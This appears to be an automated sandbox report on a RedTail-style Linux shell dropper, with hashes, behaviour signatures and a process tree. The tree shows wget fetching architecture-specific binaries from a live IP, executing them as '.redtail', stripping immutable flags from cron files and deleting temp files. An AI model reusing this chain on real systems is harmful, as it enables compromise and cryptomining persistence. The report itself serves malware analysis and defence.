Analysis
-
max time kernel
38s -
max time network
39s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24-11-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
sh.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sh.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sh.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
sh.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
sh.sh
-
Size
1KB
-
MD5
5a86127d998b5c3496802959ac0a3d11
-
SHA1
21d05b5a016cdd8245e24778e479bf6330867c3f
-
SHA256
aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b
-
SHA512
3270ff6b4bb0dde62180e605a7fc114497df627c8cb5cb4865040e9d287123a4b4855d4e6e386757e9bba0b57f1ef02fb1d81204bfc83612ac87a109962b6e98
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid process 776 chmod 874 chmod 883 chmod 889 chmod 895 chmod -
Executes dropped EXE 4 IoCs
Processes:
.redtail.redtail.redtail.redtailioc pid process /.redtail 875 .redtail /.redtail 884 .redtail /.redtail 890 .redtail /.redtail 896 .redtail -
Attempts to change immutable files 22 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
grepchattrgrepgrepchattrgrepgrepchattrchattrchattrchattrchattrchattrchattrchattrgrepchattrgrepgrepchattrchattrchattrpid process 793 grep 801 chattr 807 grep 824 grep 784 chattr 798 grep 816 grep 792 chattr 789 chattr 797 chattr 805 chattr 810 chattr 819 chattr 821 chattr 822 chattr 786 grep 791 chattr 802 grep 811 grep 815 chattr 823 chattr 785 chattr -
Processes:
resource yara_rule /x86_64 upx /i686 upx /aarch64 upx /arm7 upx -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
systemctlsystemctldescription ioc process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Processes:
systemctlmvmvfindsystemctlmvmvmvcatawkmvmvmvdescription ioc process File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems find File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/mounts cat File opened for reading /proc/self/maps awk File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems mv -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
shdescription ioc process File opened for modification /tmp/clean_crontab sh
Processes
-
/tmp/sh.sh/tmp/sh.sh1⤵PID:730
-
/bin/grepgrep noexec2⤵PID:736
-
-
/bin/catcat /proc/mounts2⤵
- Reads runtime system information
PID:735
-
-
/usr/bin/awkawk "{print \$2}"2⤵
- Reads runtime system information
PID:737
-
-
/usr/bin/whoamiwhoami2⤵PID:748
-
-
/usr/bin/findfind / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*"2⤵
- Reads runtime system information
PID:751
-
-
/bin/unameuname -mp2⤵PID:770
-
-
/usr/bin/touchtouch .testfile2⤵PID:771
-
-
/bin/dddd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"2⤵PID:773
-
-
/bin/rmrm -rf .testfile .testfile22⤵PID:774
-
-
/usr/bin/wgetwget http://45.202.35.190/clean2⤵PID:775
-
-
/bin/chmodchmod +x clean2⤵
- File and Directory Permissions Modification
PID:776
-
-
/bin/shsh clean2⤵
- Writes file to tmp directory
PID:778 -
/bin/systemctlsystemctl disable c3pool_miner3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:780
-
-
/bin/systemctlsystemctl stop c3pool_miner3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:781
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/crontabs3⤵
- Attempts to change immutable files
PID:784
-
-
/usr/bin/chattrchattr -ia /etc/crontab3⤵
- Attempts to change immutable files
PID:785
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab3⤵
- Attempts to change immutable files
PID:786
-
-
/bin/mvmv /tmp/clean_crontab /etc/crontab3⤵
- Reads runtime system information
PID:788
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly3⤵
- Attempts to change immutable files
PID:789
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily3⤵
- Attempts to change immutable files
PID:791
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/apt-compat3⤵
- Attempts to change immutable files
PID:792
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat3⤵
- Attempts to change immutable files
PID:793
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/apt-compat3⤵
- Reads runtime system information
PID:795
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/bsdmainutils3⤵
- Attempts to change immutable files
PID:797
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils3⤵
- Attempts to change immutable files
PID:798
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/bsdmainutils3⤵
- Reads runtime system information
PID:799
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/dpkg3⤵
- Attempts to change immutable files
PID:801
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg3⤵
- Attempts to change immutable files
PID:802
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/dpkg3⤵
- Reads runtime system information
PID:804
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/exim4-base3⤵
- Attempts to change immutable files
PID:805
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base3⤵
- Attempts to change immutable files
PID:807
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/exim4-base3⤵
- Reads runtime system information
PID:809
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/logrotate3⤵
- Attempts to change immutable files
PID:810
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate3⤵
- Attempts to change immutable files
PID:811
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/logrotate3⤵
- Reads runtime system information
PID:813
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/passwd3⤵
- Attempts to change immutable files
PID:815
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd3⤵
- Attempts to change immutable files
PID:816
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/passwd3⤵
- Reads runtime system information
PID:817
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly3⤵
- Attempts to change immutable files
PID:819
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly3⤵
- Attempts to change immutable files
PID:821
-
-
/usr/bin/chattrchattr -ia /etc/cron.d3⤵
- Attempts to change immutable files
PID:822
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab3⤵
- Attempts to change immutable files
PID:823
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab3⤵
- Attempts to change immutable files
PID:824
-
-
/bin/mvmv /tmp/clean_crontab /etc/anacrontab3⤵
- Reads runtime system information
PID:826
-
-
/bin/rmrm -rf /tmp/sh.sh /tmp/systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-PFX2SO3⤵PID:828
-
-
/bin/rmrm -rf /var/tmp/systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-QcIFLg3⤵PID:829
-
-
/bin/rmrm -rf "/dev/shm/*"3⤵PID:830
-
-
-
/bin/rmrm -rf clean2⤵PID:832
-
-
/bin/rmrm -rf .redtail2⤵PID:833
-
-
/bin/grepgrep -q x86_642⤵PID:836
-
-
/bin/grepgrep -q amd642⤵PID:838
-
-
/bin/grepgrep -q "i[3456]86"2⤵PID:840
-
-
/bin/grepgrep -q armv82⤵PID:843
-
-
/bin/grepgrep -q aarch642⤵PID:846
-
-
/bin/grepgrep -q armv72⤵PID:848
-
-
/usr/bin/wgetwget http://45.202.35.190/x86_642⤵PID:850
-
-
/bin/catcat x86_642⤵PID:872
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:874
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm -rf x86_642⤵PID:878
-
-
/usr/bin/wgetwget http://45.202.35.190/i6862⤵PID:879
-
-
/bin/catcat i6862⤵PID:882
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:883
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm -rf i6862⤵PID:886
-
-
/usr/bin/wgetwget http://45.202.35.190/aarch642⤵PID:887
-
-
/bin/catcat aarch642⤵PID:888
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:889
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm -rf aarch642⤵PID:892
-
-
/usr/bin/wgetwget http://45.202.35.190/arm72⤵PID:893
-
-
/bin/catcat arm72⤵PID:894
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:895
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm -rf arm72⤵PID:898
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5b2d1236c286a3c0704224fe4105eca49
SHA17d76d48d64d7ac5411d714a4bb83f37e3e5b8df6
SHA2565647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee
SHA512731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6
-
Filesize
1.3MB
MD5322095f828345179dc422bcf65db4b61
SHA1c244dce124772e0d94a01b3bc0d5d005614101b2
SHA256992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472
SHA512c8da61b2ee95cae3eb62d4985be6eeee41976fa0a69e0c738353e7e179454e8872d52152ca6df54949a6c6dd42f48b0981593c1f4f973e9e1e176ba4ca978f70
-
Filesize
1.1MB
MD5045daa66263bfd467051c013e9222faf
SHA14b943b14526d7bf7be2b3e3f9af24d1f35015548
SHA256d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4
SHA512bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f
-
Filesize
795B
MD5397ff5e54194072e6d8a44a0d8cc1b27
SHA142477b0c3b277b5e907b0a35c644f3291ed30a63
SHA256d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e
SHA512ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74
-
Filesize
1.5MB
MD501fc359f540fca7f496b5c4841c67f7e
SHA14689b4afff6f08b8c9e781d07c3a782823a6689f
SHA25669dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586
SHA5124d7170159ec6a651cd7b8e64ab06aa76f3bb691be70d219a7dbc1116a383f43226ec6815ae51fe23b25c9450f142cba0ba71ce659dae9ca376e97f126e81a4fc
-
Filesize
1KB
MD530e858769aacd9cc309502f8d5c6aa0f
SHA1927c06dd4d6cbb5ca02e9505011c8667c47f2d6e
SHA256eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd
SHA512f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c
-
Filesize
3KB
MD502f33c9e59b27bcd241e488cd48de072
SHA19247eee9b2310d56455beccf41c577ba16b78e3d
SHA2562565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14
SHA5121eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d
-
Filesize
249B
MD5db990990933b6f56322725223f13c2bc
SHA1387303696a796e27f559c73679e979f2a538072d
SHA256777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1
SHA512a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5
-
Filesize
722B
MD58f111d100ea459f68d333d63a8ef2205
SHA1077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA2560e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb
-
Filesize
1KB
MD5bc4a71cbcaeed4179f25d798257fa980
SHA161445721d0b5d86ac0a8386a4ceef450118f4fbb
SHA2568eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767
SHA512709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c
-
Filesize
279B
MD5911a774fe040993b929504f3d9415ab3
SHA155ccc8e95097f005abf9f4d91a14394e6d0f5da5
SHA256340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d
SHA5121eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f
-
Filesize
1.6MB
MD5f6634e2fb7872be767a2cb5b1da04103
SHA1532037729f2da9fc1341f744e5afa2420bcfebca
SHA25629f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b
SHA512e1b34b5235ecfe8f74698d10ecf70758adcb5ef2832b3be272fe737770f47daf4974fe6c957ccf24282a1a0af4a4cca393727517ea5ade97504a55b3b6a6ff51